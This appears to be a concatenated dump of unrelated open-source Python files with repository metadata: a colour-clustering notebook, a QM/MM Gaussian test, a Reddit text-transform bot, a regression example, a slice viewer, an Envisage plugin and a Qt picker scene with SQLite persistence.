        self.assertEqual(cw.height,160)
        self.assertEqual(cw.stripes,20)
        root.destroy()
if __name__ == '__main__':
    unittest.main()
| 2.203125 | 2 |
get_color.py | Stardust2019/color_detection | 0 | 12766420 | <gh_stars>0
# -*- coding: utf-8 -*-
"""Untitled4.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1m75Wo1EiDbx-VZgELdYDgJsanmkE9pQb
"""
# Commented out IPython magic to ensure Python compatibility.
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import numpy as np
import cv2
from collections import Counter
from skimage.color import rgb2lab, deltaE_cie76
# %matplotlib inline
# Colab/notebook export: the image load below is duplicated after the second
# import block (an artifact of cell-by-cell export); behaviour is unchanged.
image = cv2.imread('sample_image.jpg')
print("The type of this input is {}".format(type(image)))
plt.imshow(image)
# Commented out IPython magic to ensure Python compatibility.
# %cd '/content/drive/My Drive'
# Commented out IPython magic to ensure Python compatibility.
from sklearn.cluster import KMeans
import matplotlib.pyplot as plt
import numpy as np
import cv2
from collections import Counter
from skimage.color import rgb2lab, deltaE_cie76
import os
# %matplotlib inline
image = cv2.imread('sample_image.jpg')
print("The type of this input is {}".format(type(image)))
print("Shape: {}".format(image.shape))
plt.imshow(image)
# OpenCV loads BGR; convert to RGB so matplotlib displays true colours.
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
plt.imshow(image)
def RGB2HEX(color):
    """Convert an RGB triple (any numeric type) to a '#rrggbb' hex string."""
    red, green, blue = int(color[0]), int(color[1]), int(color[2])
    return "#{:02x}{:02x}{:02x}".format(red, green, blue)
def get_image(image_path):
    """Load the image at *image_path* and return it in RGB channel order."""
    bgr_image = cv2.imread(image_path)
    return cv2.cvtColor(bgr_image, cv2.COLOR_BGR2RGB)
def get_colors(image, number_of_colors, show_chart):
    """Cluster the image's pixels with KMeans and return the dominant colors.

    Args:
        image: RGB image array (as returned by get_image).
        number_of_colors: number of KMeans clusters / colors to extract.
        show_chart: if truthy, also draw a pie chart of the color shares.

    Returns:
        List of RGB cluster-center arrays, ordered by cluster label.
    """
    # Downsample to a fixed size, then flatten to an (N, 3) pixel matrix.
    modified_image = cv2.resize(image, (600, 400), interpolation = cv2.INTER_AREA)
    modified_image = modified_image.reshape(modified_image.shape[0]*modified_image.shape[1], 3)
    clf = KMeans(n_clusters = number_of_colors)
    labels = clf.fit_predict(modified_image)
    counts = Counter(labels)
    # sort to ensure correct color percentage
    counts = dict(sorted(counts.items()))
    center_colors = clf.cluster_centers_
    # We get ordered colors by iterating through the keys
    ordered_colors = [center_colors[i] for i in counts.keys()]
    hex_colors = [RGB2HEX(ordered_colors[i]) for i in counts.keys()]
    rgb_colors = [ordered_colors[i] for i in counts.keys()]
    if (show_chart):
        plt.figure(figsize = (8, 6))
        plt.pie(counts.values(), labels = hex_colors, colors = hex_colors)
    return rgb_colors
get_colors(get_image('sample_image.jpg'), 8, True)
'''IMAGE_DIRECTORY = 'images'
COLORS = {
'GREEN': [0, 128, 0],
'BLUE': [0, 0, 128],
'YELLOW': [255, 255, 0]
}
images = []
for file in os.listdir(IMAGE_DIRECTORY):
if not file.startswith('.'):
images.append(get_image(os.path.join(IMAGE_DIRECTORY, file)))
plt.figure(figsize=(20, 10))
for i in range(len(images)):
plt.subplot(1, len(images), i+1)
plt.imshow(images[i])'''
'''def match_image_by_color(image, color, threshold = 60, number_of_colors = 10):
image_colors = get_colors(image, number_of_colors, False)
selected_color = rgb2lab(np.uint8(np.asarray([[color]])))
select_image = False
for i in range(number_of_colors):
curr_color = rgb2lab(np.uint8(np.asarray([[image_colors[i]]])))
diff = deltaE_cie76(selected_color, curr_color)
if (diff < threshold):
select_image = True
return select_image
def show_selected_images(images, color, threshold, colors_to_match):
index = 1
for i in range(len(images)):
selected = match_image_by_color(images[i],
color,
threshold,
colors_to_match)
if (selected):
plt.subplot(1, 5, index)
plt.imshow(images[i])
index += 1
# Search for GREEN
plt.figure(figsize = (20, 10))
show_selected_images(images, COLORS['GREEN'], 60, 5)
# Search for BLUE
plt.figure(figsize = (20, 10))
show_selected_images(images, COLORS['BLUE'], 60, 5)'''
| 2.859375 | 3 |
env.py | ed-chin-git/hacker_nlp | 0 | 12766421 | replace this text with actual google credentials
| 0.949219 | 1 |
samples/test_gaussian.py | sergio-marti/ren-qm3 | 0 | 12766422 | import numpy
import qm3
import qm3.engines.gaussian
import io
import os
import sys
# Resolve paths relative to this script so the CHARMM inputs are found.
cwd = os.path.abspath( os.path.dirname( sys.argv[0] ) ) + os.sep
mol = qm3.molecule()
mol.pdb_read( open( cwd + "charmm.pdb" ) )
mol.psf_read( open( cwd + "charmm.psf" ) )
mol.guess_atomic_numbers()
print( mol.anum )
print( mol.chrg )
# QM region: everything except the waters and the listed ligand atoms.
sqm = mol.resn == "WAT"
for a in [ "C6", "C9", "H11", "H12", "H13", "H14", "H15" ]:
    sqm[mol.indx["A"][1][a]] = True
sqm = numpy.logical_not( sqm )
# MM region: atoms within 12 A of the QM selection; one link atom C10-C6.
smm = mol.sph_sel( sqm, 12 )
sla = [ ( mol.indx["A"][1]["C10"], mol.indx["A"][1]["C6"] ) ]
# Gaussian input template; qm3_* placeholders are filled in by the engine.
f = io.StringIO( """%chk=gauss.chk
%mem=2048mb
%nproc=2
#p b3lyp/def2svp qm3_job qm3_guess charge prop=(field,read) scf=direct nosymm fchk
.
1 1
qm3_atoms
qm3_charges
qm3_field
""" )
mol.engines["qm"] = qm3.engines.gaussian.run( mol, f, sqm, smm, sla )
mol.engines["qm"].exe = ". ~/Devel/g09/pgi.imac64/g09.profile; g09 gauss.com"
mol.get_grad()
# Regression checks against reference energy/gradient values (kJ/mol units
# per QM3 convention — TODO confirm).
print( mol.func )
assert( numpy.fabs( mol.func - -697633.7375 ) < 0.001 ), "function error"
print( numpy.linalg.norm( mol.grad ) )
assert( numpy.fabs( numpy.linalg.norm( mol.grad ) - 575.7341 ) < 0.001 ), "gradient error"
print( numpy.linalg.norm( mol.grad[mol.indx["A"][1]["C10"]] ) )
assert( numpy.fabs( numpy.linalg.norm( mol.grad[mol.indx["A"][1]["C10"]] ) - 68.4270 ) < 0.001 ), "QM-LA gradient error"
| 1.820313 | 2 |
taboo.py | AdityaPandeyCS/ta13oo-reddit-bot | 1 | 12766423 | import praw
import re
import csv
import operator
import os
def process_comment(comment):
    """Handle one Reddit comment that triggered the bot.

    Depends on module globals set in __main__: triggers, commentType, users,
    submission.  Side effects: replies via praw, appends processed ids to
    comments.txt, rewrites users.csv, and edits the leaderboard submission.
    NOTE(review): several `open(...).write(...)` calls below rely on CPython
    refcounting to close the file handles.
    """
    try:
        body = comment.body
        user = comment.author.name
        linkID = comment.link_id
        id = comment.id
        parent = comment.parent()
        # !delete
        # Only the original commenter (or the bot owner) may delete one of the
        # bot's replies to them.
        if (triggers[2] in body and isinstance(parent, commentType) and isinstance(parent.parent(), commentType)
            and parent.author.name == 'F1N1ZH_EM_ZEL' and (parent.parent().author.name == user or 'adityapstar' in user)):
            grandparentUser = parent.parent().author.name
            parentBody = parent.body
            parentLinkID = parent.link_id
            parentID = parent.id
            parent.delete()
            print('Deleted: "{}" by u/{} ({}, {})'.format(parentBody, grandparentUser, parentLinkID, parentID))
            open("comments.txt", "a").write(id + '\n')
            return
        # skip if already parsed
        with open('comments.txt', 'r') as file:
            if id in file.read().splitlines():
                return
        # keep track of number of times each user has called the bot
        if user in users:
            users[user] += 1
        elif user != 'adityapstar':
            users[user] = 1
        with open('users.csv', 'w', newline='') as f:
            w = csv.writer(f)
            w.writerows(users.items())
        # Rebuild the markdown leaderboard and update the pinned submission
        # only when it actually changed.
        sortedUsers = sorted(users.items(), key=operator.itemgetter(1), reverse=True)
        nathans = 'u/ | bruh moments\n---|---\n🏆'
        for username, val in sortedUsers:
            if val > 1:
                nathans += username.replace('_','\_') + ' | ' + str(val) + '\n'
        if submission.selftext+'\n' != nathans:
            submission.edit(nathans)
        # determine which trigger
        indexOfOriginal = body.find(triggers[0])
        indexOfPlus = body.find(triggers[1])
        if indexOfPlus == -1 or ((indexOfOriginal < indexOfPlus) and indexOfPlus != -1 and indexOfOriginal != -1):
            trigger = triggers[0]
            message = body[indexOfOriginal + 6:]
        else:
            trigger = triggers[1]
            message = body[indexOfPlus + 6:]
        # remove whitespace characters
        message = removeNPC(message)
        # remove leading spaces
        pos = 0
        for c in message:
            if c == ' ':
                pos += 1
            else:
                break
        message = message[pos:]
        # act on parent if comment is blank
        if not message:
            if (isinstance(parent, commentType)):
                message = parent.body
            else:
                message = parent.title
            # apply filters to parent
            message = removeNPC(message)
        # discourage repeated calls
        if (message == "[HTTPZ://1.1MGUR.COM/CDTL4VX.G1F](https://i.imgur.com/cDTl4Vx.gif)"):
            print("replied to kanye.gif")
            comment.reply("[HTTPZ://1.1MGUR.COM/CDTL4VX.G1F](https://i.imgur.com/cDTl4Vx.gif)")
            open("comments.txt", "a").write(id + '\n')
            return
        final = tabooify(message, trigger)
        # Reddit's comment length limit: bail out with the gif instead.
        if len(final) > 9999:
            print("u/{}'s comment was too long ({}, {}, {})".format(user, linkID, id, str(len(final))))
            comment.reply("[HTTPZ://1.1MGUR.COM/CDTL4VX.G1F](https://i.imgur.com/cDTl4Vx.gif)")
            open("comments.txt", "a").write(id + '\n')
            return
        # success
        print('Replying to: "{}" by u/{} ({}, {})'.format(body, user, linkID, id))
        comment.reply(final)
        with open('comments.txt', 'a') as file:
            file.write(id + '\n')
    except Exception as e:
        # Record the id even on failure so the bot never retries in a loop.
        print("process_comment(): exception occurred")
        print(e)
        print('Tried replying to: "{}" by u/{} ({}, {})'.format(body, user, linkID, id))
        open("comments.txt", "a").write(id + '\n')
        return
def removeNPC(string):
    # Strip an invisible character (the regex literal below contains a
    # zero-width character — presumably U+200B, TODO confirm) and all spaces.
    return re.compile("​", re.IGNORECASE).sub("", string).replace(" ", "")
def applySwaps(swaps, message):
    """Apply each old->new substitution in *swaps*, in dict order, to *message*.

    Substitutions are sequential, so a later rule can rewrite the output of
    an earlier one.
    """
    result = message
    for old, new in swaps.items():
        result = result.replace(old, new)
    return result
def tabooify(original, trigger):
    """Return "<ORIGINAL> | <LEETIFIED>" for the given trigger.

    Uses the module-global `triggers` list: the '!taboo' trigger applies a
    small substitution set, '+taboo' a larger one.  Markdown links are
    protected by mapping their leetified form back to the original URL.
    """
    original = original.upper()
    if (trigger == triggers[0]):
        swaps = {'B':'13','S':'Z','I':'1','#':'','13LACK METAL TERROR1ZT':'13 M T'}
    else:
        swaps = {'B':'13','S':'Z','I':'1','E':'3','O':'0','A':'4','T':'7','U':'V','#':''}
    # Undo the substitutions inside markdown link targets so URLs stay valid.
    links = re.findall('\[.*?\]\((.*?)\)', original)
    swaps.update({applySwaps(swaps, link):link for link in links})
    final = original + " | " + applySwaps(swaps, original)
    return final
if __name__ == '__main__':
    # Trigger strings recognised in comment bodies; index 2 is the delete cmd.
    triggers = ['!taboo', '+taboo', '!delete']
    commentType = praw.models.reddit.comment.Comment
    # Load the persisted per-user call counts.
    with open('users.csv','r') as f:
        reader = csv.reader(f)
        users = {rows[0]:int(rows[1]) for rows in reader}
    print("logging in...")
    # NOTE(review): the `<PASSWORD>` token below is a redaction artifact and is
    # not valid Python; restore the real credential lookup before running.
    reddit = praw.Reddit(user_agent=os.environ.get('USER_AGENT'),
                         client_id=os.environ.get('CLIENT_ID'), client_secret=os.environ.get('CLIENT_SECRET'),
                         username=os.environ.get('USER_NAME'), password=<PASSWORD>('PASSWORD'))
    print("listening...")
    subreddit = reddit.subreddit('hiphopcirclejerk+denzelcurry+test')
    # Pinned leaderboard submission edited by process_comment().
    submission = reddit.submission(id='cfg95e')
    for comment in subreddit.stream.comments():
        if re.search("[!+]taboo", comment.body) or '!delete' in comment.body:
            process_comment(comment)
| 2.890625 | 3 |
B03898_02_Codes/B03898_02_02.py | prakharShuklaOfficial/Mastering-Python-for-Finance-source-codes | 446 | 12766424 | <reponame>prakharShuklaOfficial/Mastering-Python-for-Finance-source-codes<filename>B03898_02_Codes/B03898_02_02.py
"""
README
======
This is a Python code.
======
"""
""" Least squares regression with statsmodels """
import numpy as np
import statsmodels.api as sm
# Generate some sample data
num_periods = 9
all_values = np.array([np.random.random(8)
for i in range(num_periods)])
# Filter the data
y_values = all_values[:, 0] # First column values as Y
x_values = all_values[:, 1:] # All other values as X
x_values = sm.add_constant(x_values) # Include the intercept
results = sm.OLS(y_values, x_values).fit() # Regress and fit the model
print results.summary()
print results.params
| 2.015625 | 2 |
slice_plotter.py | stockmann-lab/ASL_coil | 0 | 12766425 | <filename>slice_plotter.py<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
class Slice_Plotter:
    """Scroll-through viewer for a 3-D volume, shown one z-slice at a time.

    Connect `onscroll` to a matplotlib 'scroll_event' to page through slices;
    per-slice patch lists can be attached via add_patch/pop_patch.
    """
    def __init__(self, ax, X, title='', vmin=None, vmax=None, cmap=None, patches=None):
        """Draw the first slice of X (rows x cols x slices) on axes *ax*.

        vmin/vmax default to the volume's nan-aware min/max so the colour
        scale stays fixed while scrolling; NaNs render black by default.
        """
        self.ax = ax
        ax.set_title(title)
        if cmap is None:
            cmap = plt.get_cmap('rainbow')
            cmap.set_bad('black')
        if vmin is None:
            vmin=np.nanmin(X)
        if vmax is None:
            vmax=np.nanmax(X)
        self.X = X
        self.rows, self.cols, self.slices = X.shape
        self.ind = 0
        if patches is None:
            patches = [[] for _ in range(self.slices)]
        self.patches = patches
        self.im = ax.imshow(self.X[:, :, self.ind], vmin=vmin, vmax=vmax, cmap=cmap)
        self.update()
    def onscroll(self, event):
        """Scroll handler: step the slice index, clamped to [0, slices-1]."""
        ind_max = self.slices
        if event.button == 'up':
            self.ind = (self.ind + 1)
        else:
            self.ind = (self.ind - 1)
        if self.ind >= ind_max:
            self.ind = ind_max - 1
        if self.ind < 0:
            self.ind = 0
        self.ax.patches = []
        self.update()
    def update(self):
        """Redraw the current slice and its patches."""
        self.im.set_data(self.X[:, :, self.ind])
        self.ax.set_ylabel('slice %s (scroll)' % self.ind)
        self.ax.patches = []
        for patch in self.patches[self.ind]:
            self.ax.add_patch(patch)
        self.im.axes.figure.canvas.draw()
    def add_patch(self, patch, ind):
        """Attach *patch* to slice *ind* and redraw."""
        self.patches[ind].append(patch)
        self.update()
    def pop_patch(self, ind):
        """Remove the most recently added patch from slice *ind*, if any."""
        if len(self.patches[ind]) > 0:
            self.patches[ind].pop()
            self.update()
def quick_slice_plot(X, title='', cmap=None, vmin=None, vmax=None, patches=None):
    """Open a standalone, scrollable slice viewer for volume X (blocking).

    The volume's first two axes are transposed before display.

    Bug fix: vmin/vmax were previously accepted but never forwarded to
    Slice_Plotter, so custom colour limits were silently ignored.
    """
    quick_fig, quick_ax = plt.subplots(1, 1)
    plotter_quick = Slice_Plotter(quick_ax, np.transpose(X, axes=(1, 0, 2)),
                                  title=title, vmin=vmin, vmax=vmax,
                                  cmap=cmap, patches=patches)
    quick_fig.canvas.mpl_connect('scroll_event', plotter_quick.onscroll)
    plt.show(block=True)
| 2.65625 | 3 |
pyatdllib/ui/too_big_protobuf_test.py | lisagorewitdecker/immaculater | 0 | 12766426 | """Unittests for module 'immaculater' that cannot live peaceably with immaculater_test.
This unittest is separate because once you call SetAllowOversizeProtos(True)
you cannot change it.
"""
from __future__ import absolute_import
from __future__ import unicode_literals
from __future__ import print_function
import pipes
import gflags as flags # https://github.com/gflags/python-gflags
from pyatdllib.ui import serialization
from pyatdllib.ui import test_helper
FLAGS = flags.FLAGS
class TooBigProtobufTestCase(test_helper.TestHelper):
  """Verifies that saving fails cleanly when the protobuf exceeds the cap.

  Lives in its own file because SetAllowOversizeProtos cannot be reverted
  once enabled (see the module docstring).
  """
  def setUp(self):
    super().setUp()
    # Allow oversize protos so the large fixture can be built at all.
    FLAGS.pyatdl_allow_infinite_memory_for_protobuf = True
  def testTooBigToSaveError(self):
    # Re-enable the size check so the oversized save is rejected.
    FLAGS.pyatdl_allow_infinite_memory_for_protobuf = False
    save_path = self._CreateTmpFile('')
    inputs = ['loadtest -n 100',
              'save %s' % pipes.quote(save_path)
    ]
    self.helpTest(inputs, serialization.TooBigToSaveError)
if __name__ == '__main__':
  test_helper.main()
| 2.265625 | 2 |
envisage/core_plugin.py | robmcmullen/envisage | 0 | 12766427 | """ The Envisage core plugin. """
# Enthought library imports.
from envisage.api import ExtensionPoint, Plugin, ServiceOffer
from traits.api import List, Instance, on_trait_change, Str
class CorePlugin(Plugin):
""" The Envisage core plugin.
The core plugin offers facilities that are generally useful when building
extensible applications such as adapters, categories and hooks etc. It does
not contain anything to do with user interfaces!
The core plugin should be started before any other plugin. It is up to
the plugin manager to do this.
"""
# Extension point Ids.
CATEGORIES = 'envisage.categories'
CLASS_LOAD_HOOKS = 'envisage.class_load_hooks'
PREFERENCES = 'envisage.preferences'
SERVICE_OFFERS = 'envisage.service_offers'
#### 'IPlugin' interface ##################################################
# The plugin's unique identifier.
id = 'envisage.core'
# The plugin's name (suitable for displaying to the user).
name = 'Core'
#### Extension points offered by this plugin ##############################
# Categories are actually implemented via standard 'ClassLoadHooks', but
# for (hopefully) readability and convenience we have a specific extension
# point.
categories = ExtensionPoint(
List(Instance('envisage.category.Category')),
id = CATEGORIES,
desc = """
Traits categories allow you to dynamically extend a Python class with
extra attributes, methods and events.
Contributions to this extension point allow you to import categories
*lazily* when the class to be extended is imported or created. Each
contribution contains the name of the category class that you want to
add (the 'class_name') and the name of the class that you want to
extend (the 'target_class_name').
e.g. To add the 'FooCategory' category to the 'Foo' class::
Category(
class_name = 'foo_category.FooCategory',
target_class_name = 'foo.Foo'
)
"""
)
    @on_trait_change('categories_items')
    def _categories_items_changed(self, event):
        """ React to new categories being *added*.

        *event* is the trait list-change event; only 'event.added' is used.
        Note that we don't currently do anything if categories are *removed*.
        """
        self._add_category_class_load_hooks(event.added)
        return
class_load_hooks = ExtensionPoint(
List(Instance('envisage.class_load_hook.ClassLoadHook')),
id = CLASS_LOAD_HOOKS,
desc = """
Class load hooks allow you to be notified when any 'HasTraits' class
is imported or created.
See the documentation for 'ClassLoadHook' for more details.
"""
)
    @on_trait_change('class_load_hooks_items')
    def _class_load_hooks_changed(self, event):
        """ React to new class load hooks being *added*.

        *event* is the trait list-change event; only 'event.added' is used.
        Note that we don't currently do anything if class load hooks are
        *removed*.
        """
        self._connect_class_load_hooks(event.added)
        return
preferences = ExtensionPoint(
List(Str),
id = PREFERENCES,
desc = """
Preferences files allow plugins to contribute default values for
user preferences. Each contributed string must be the URL of a
file-like object that contains preferences values.
e.g.
'pkgfile://envisage/preferences.ini'
- this looks for the 'preferences.ini' file in the 'envisage'
package.
'file://C:/tmp/preferences.ini'
- this looks for the 'preferences.ini' file in 'C:/tmp'
'http://some.website/preferences.ini'
- this looks for the 'preferences.ini' document on the 'some.website'
web site!
The files themselves are parsed using the excellent 'ConfigObj'
package. For detailed documentation please go to:-
http://www.voidspace.org.uk/python/configobj.html
"""
)
    @on_trait_change('preferences_items')
    def _preferences_changed(self, event):
        """ React to new preferencess being *added*.

        *event* is the trait list-change event; only 'event.added' is used.
        Note that we don't currently do anything if preferences are *removed*.
        """
        self._load_preferences(event.added)
        return
service_offers = ExtensionPoint(
List(ServiceOffer),
id = SERVICE_OFFERS,
desc = """
Services are simply objects that a plugin wants to make available to
other plugins. This extension point allows you to offer services
that are created 'on-demand'.
e.g.
my_service_offer = ServiceOffer(
protocol = 'acme.IMyService',
factory = an_object_or_a_callable_that_creates_one,
properties = {'a dictionary' : 'that is passed to the factory'}
)
See the documentation for 'ServiceOffer' for more details.
"""
)
@on_trait_change('service_offers_items')
def _service_offers_changed(self, event):
""" React to new service offers being *added*.
Note that we don't currently do anything if services are *removed* as
we have no facility to let users of the service know that the offer
has been retracted.
"""
for service in event.added:
self._register_service_offer(service)
return
#### Contributions to extension points made by this plugin ################
# None.
###########################################################################
# 'IPlugin' interface.
###########################################################################
    def start(self):
        """ Start the plugin.

        Applies every contribution made before the plugin started; later
        contributions are handled by the '_*_items_changed' listeners above.
        """
        # Load all contributed preferences files into the application's root
        # preferences node.
        self._load_preferences(self.preferences)
        # Connect all class load hooks.
        self._connect_class_load_hooks(self.class_load_hooks)
        # Add class load hooks for all of the contributed categories. The
        # category will be imported and added when the associated target class
        # is imported/created.
        self._add_category_class_load_hooks(self.categories)
        # Register all service offers.
        #
        # These services are unregistered by the default plugin activation
        # strategy (due to the fact that we store the service ids in this
        # specific trait!).
        self._service_ids = self._register_service_offers(self.service_offers)
        return
###########################################################################
# Private interface.
###########################################################################
def _add_category_class_load_hooks(self, categories):
""" Add class load hooks for a list of categories. """
for category in categories:
class_load_hook = self._create_category_class_load_hook(category)
class_load_hook.connect()
return
def _connect_class_load_hooks(self, class_load_hooks):
""" Connect all class load hooks. """
for class_load_hook in class_load_hooks:
class_load_hook.connect()
return
def _create_category_class_load_hook(self, category):
""" Create a category class load hook. """
# Local imports.
from .class_load_hook import ClassLoadHook
def import_and_add_category(cls):
""" Import a category and add it to a class.
This is a closure that binds 'self' and 'category'.
"""
category_cls = self.application.import_symbol(category.class_name)
cls.add_trait_category(category_cls)
return
category_class_load_hook = ClassLoadHook(
class_name = category.target_class_name,
on_load = import_and_add_category
)
return category_class_load_hook
    def _load_preferences(self, preferences):
        """ Load all contributed preferences into a preferences node.

        'preferences' is a list of resource URLs ('pkgfile://', 'file://',
        'http://') that ResourceManager can open.
        """
        # Enthought library imports.
        from envisage.resource.api import ResourceManager
        # We add the plugin preferences to the default scope. The default scope
        # is a transient scope which means that (quite nicely ;^) we never
        # save the actual default plugin preference values. They will only get
        # saved if a value has been set in another (persistent) scope - which
        # is exactly what happens in the preferences UI.
        default = self.application.preferences.node('default/')
        # The resource manager is used to find the preferences files.
        resource_manager = ResourceManager()
        for resource_name in preferences:
            f = resource_manager.file(resource_name)
            try:
                default.load(f)
            finally:
                # Always release the handle, even if parsing fails.
                f.close()
        return
def _register_service_offers(self, service_offers):
""" Register a list of service offers. """
return list(map(self._register_service_offer, service_offers))
def _register_service_offer(self, service_offer):
""" Register a service offer. """
service_id = self.application.register_service(
protocol = service_offer.protocol,
obj = service_offer.factory,
properties = service_offer.properties
)
return service_id
### EOF ######################################################################
| 2.015625 | 2 |
Contents/scripts/picapicker/scene.py | mochio326/PicaPicker | 2 | 12766428 | # -*- coding: utf-8 -*-
from .vendor.Qt import QtCore, QtGui, QtWidgets, QtSql
from .node import Picker, BgNode, GroupPicker
from .line import Line
class SaveData(object):
    """ Saves the picker scene to, and restores it from, a SQLite file.

    One table per item type (Picker, GroupPicker, BgNode); the tuples below
    are the (column name, SQL type) schemas for those tables.
    """

    # Columns for regular picker nodes.
    PICKER_TABLE_DATA = (('id', 'text PRIMARY KEY'),
                         ('x', 'real'),
                         ('y', 'real'),
                         ('z', 'real'),
                         ('width', 'integer'),
                         ('height', 'integer'),
                         ('node_name', 'text'),
                         ('label', 'text'),
                         ('bg_color', 'text')
                         )

    # Columns for group pickers; 'member_nodes_id' stores the member ids.
    GROUP_PICKER_TABLE_DATA = (('id', 'text PRIMARY KEY'),
                               ('x', 'real'),
                               ('y', 'real'),
                               ('z', 'real'),
                               ('width', 'integer'),
                               ('height', 'integer'),
                               ('member_nodes_id', 'text'),
                               ('label', 'text'),
                               ('bg_color', 'text')
                               )

    # Columns for background images; 'data' holds the raw image blob.
    BG_IMAGE_TABLE_DATA = (('id', 'text PRIMARY KEY'),
                           ('x', 'real'),
                           ('y', 'real'),
                           ('z', 'real'),
                           ('width', 'integer'),
                           ('height', 'integer'),
                           ('data', 'blob')
                           )

    def __init__(self, scene):
        # Scene whose items are serialised / recreated.
        self.scene = scene

    def load(self, file_path):
        """ Clear the scene and repopulate it from the SQLite file. """
        self.scene.clear()
        db = QtSql.QSqlDatabase.addDatabase('QSQLITE')
        db.setDatabaseName(file_path)
        db.open()
        query = QtSql.QSqlQuery(db)
        self._create_picker(query, 'picker', Picker)
        self._create_picker(query, 'group_picker', GroupPicker)
        self._create_bg_image(query, 'bg_image')
        db.close()

    def _create_picker(self, query, table_name, picker_cls):
        """ Instantiate one 'picker_cls' item per row of 'table_name'. """
        query.exec_('SELECT * FROM {0}'.format(table_name))
        if not query.isActive():
            # Table missing in this file -- nothing to restore.
            return
        query.first()
        while query.isValid():
            _n = picker_cls()
            self.scene.picker_init(_n, 1)
            # Each item knows how to read its own columns from the row.
            _n.load_data(query)
            query.next()

    def _create_bg_image(self, query, table_name):
        """ Instantiate one BgNode per row of 'table_name'. """
        query.exec_('SELECT * FROM {0}'.format(table_name))
        if not query.isActive():
            return
        query.first()
        while query.isValid():
            _n = BgNode()
            self.scene.add_item(_n)
            _n.load_data(query)
            _n.update()
            query.next()

    def _create_table(self, query, table_name, table_format, cls):
        """ (Re)create 'table_name' and insert one row per 'cls' scene item. """
        _table_format_str = ', '.join([" ".join(map(str, _f)) for _f in table_format])
        _table_insert_value_format = ','.join(['?' for _ in table_format])
        query.exec_('DROP TABLE IF EXISTS {0}'.format(table_name))
        query.exec_('CREATE TABLE {0}({1})'.format(table_name, _table_format_str))
        query.prepare('insert into {0} values ({1})'.format(table_name, _table_insert_value_format))
        # NOTE(review): this executes the prepared insert once with no bound
        # values -- presumably a leftover; confirm it is intentional.
        query.exec_()
        for _n in self.scene.items():
            if not isinstance(_n, cls):
                continue
            # Items provide their column values via get_save_data().
            _data = _n.get_save_data()
            for i, v in enumerate(_data):
                query.bindValue(i, v)
            query.exec_()

    def save(self, file_path):
        """ Write every Picker/GroupPicker/BgNode in the scene to 'file_path'. """
        db = QtSql.QSqlDatabase.addDatabase('QSQLITE')
        db.setDatabaseName(file_path)
        db.open()
        query = QtSql.QSqlQuery(db)
        self._create_table(query, 'picker', self.PICKER_TABLE_DATA, Picker)
        self._create_table(query, 'group_picker', self.GROUP_PICKER_TABLE_DATA, GroupPicker)
        self._create_table(query, 'bg_image', self.BG_IMAGE_TABLE_DATA, BgNode)
        db.close()
class Scene(QtWidgets.QGraphicsScene):
    """ Graphics scene holding picker nodes, group pickers and bg images. """

    @property
    def is_bg_image_selectable(self):
        # Whether BgNode items may currently be selected.
        return self._is_bg_image_selectable

    @is_bg_image_selectable.setter
    def is_bg_image_selectable(self, val):
        self._is_bg_image_selectable = val
        for _n in self.items():
            if not isinstance(_n, BgNode):
                continue
            if not self._is_bg_image_selectable:
                # Drop any existing selection before locking the images.
                _n.setSelected(False)
            _n.set_selectable_flag_from_scene()

    @property
    def is_node_movable(self):
        # Whether items may currently be dragged.
        return self._is_node_movable

    @is_node_movable.setter
    def is_node_movable(self, val):
        self._is_node_movable = val
        for _n in self.items():
            _n.set_movable_flag_from_scene()

    def __init__(self):
        super(Scene, self).__init__()
        self.selectionChanged.connect(self.select_nodes)
        self.enable_edit = True            # global edit-mode toggle
        self.lock_bg_image = False         # keeps bg images fixed while editing
        self.draw_bg_grid = True           # draw the background grid
        self._is_bg_image_selectable = False
        self._is_node_movable = False
        self.grid_width = 20               # grid cell size (px)
        self.grid_height = 20
        self.snap_to_node_flag = True
        self.snap_to_grid_flag = False
        # Guide lines shown while snapping, one per axis.
        self._snap_guide = {'x': None, 'y': None}
        # NOTE: items must also be held in this Python list; without keeping
        # references here PySide sometimes misbehaved when a large number of
        # items was added.
        self.add_items = []

    def load(self, file_path=None):
        """ Restore the scene from a .picap SQLite file. """
        _sd = SaveData(self)
        if file_path is None:
            # Hard-coded development default path.
            file_path = r'C:\temp\picaPicker\sample.picap'
        _sd.load(file_path)

    def save(self, file_path=None):
        """ Save the scene to a .picap SQLite file. """
        _sd = SaveData(self)
        if file_path is None:
            # Hard-coded development default path.
            file_path = r'C:\temp\picaPicker\sample.picap'
        _sd.save(file_path)

    def del_node_snapping_guide(self, type):
        """ Remove the snap guide line for axis 'type' ('x' or 'y'). """
        if self._snap_guide[type] is not None:
            self.remove_item(self._snap_guide[type])
            self._snap_guide[type] = None

    def show_node_snapping_guide(self, pos_a, pos_b, type):
        """ Show (replacing any existing) a snap guide line for axis 'type'. """
        self.del_node_snapping_guide(type)
        self._snap_guide[type] = Line(pos_a, pos_b)
        self.add_item(self._snap_guide[type])

    def picker_init(self, picker_instance, opacity=None):
        # Perform the initial setup required whenever a picker is created.
        self.add_item(picker_instance)
        if opacity is not None:
            picker_instance.setOpacity(opacity)
        picker_instance.node_snapping.connect(self.show_node_snapping_guide)
        picker_instance.node_snapped.connect(self.del_node_snapping_guide)

    def node_snap_to_grid(self, node):
        """ Align 'node' to the top-left of its grid cell (if snapping is on). """
        if not self.snap_to_grid_flag:
            return
        node.setX(node.x() - node.x() % self.grid_width)
        node.setY(node.y() - node.y() % self.grid_height)

    def select_nodes(self):
        """ Mirror the scene selection onto the DCC tool's node selection. """
        _target_dcc_nodes = []
        # Block signals so re-selection below cannot re-enter this handler.
        self.blockSignals(True)
        for _item in self.items():
            if isinstance(_item, Picker):
                _item.group_select = False
                _item.update()
        for _item in self.selectedItems():
            if isinstance(_item, GroupPicker) and not _item.drag:
                # Selecting a group highlights and collects all its members.
                for _n in _item.get_member_nodes():
                    _n.group_select = True
                    _n.update()
                    _target_dcc_nodes.extend(_n.get_dcc_node())
            elif isinstance(_item, Picker):
                _target_dcc_nodes.extend(_item.get_dcc_node())
        self.select_dcc_nodes(_target_dcc_nodes)
        self.blockSignals(False)

    def select_dcc_nodes(self, node_list):
        # Select the given nodes on the DCC-tool side; no-op here
        # (presumably implemented by a tool-specific subclass -- confirm).
        pass

    def enable_edit_change(self):
        """ Push the current edit-mode flags onto every item. """
        for _i in self.items():
            if isinstance(_i, (Picker, GroupPicker)):
                _i.setFlag(QtWidgets.QGraphicsItem.ItemIsMovable, self.enable_edit)
            elif isinstance(_i, BgNode):
